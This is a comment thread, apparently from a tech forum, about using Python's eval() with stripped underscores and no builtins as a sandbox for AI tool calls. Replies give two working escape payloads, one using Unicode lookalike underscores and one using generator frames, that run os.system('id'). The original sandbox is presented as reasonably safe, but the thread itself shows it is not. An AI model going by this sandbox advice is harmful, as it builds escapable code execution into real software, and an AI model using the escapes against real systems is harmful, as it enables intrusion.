slightly related, if you need a safe python sandbox instead of eval(), you can try

eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})

I saw this trick on reddit many years ago and wrote a blog last month https://blog.est.im/2026/stdout-09

I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.

This sandbox won't protect you from DoS, but I think it's reasonably safe to use it for AI tool calls. Just expose your MCP/RPC methods in the last {} and you are good.

▲

farlow 3 days ago | parent [-]

You can bypass this with unicode:

eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})

▲

farlow 3 days ago | parent [-]

You can do it without unicode, too:

eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})

	▲	est 3 days ago \| parent [-]
		damn you are good. Is this a new py3 thing? I must missed lots of CTF lessons. How about adding another .replace('﹍','').replace('gi_frame', '') ?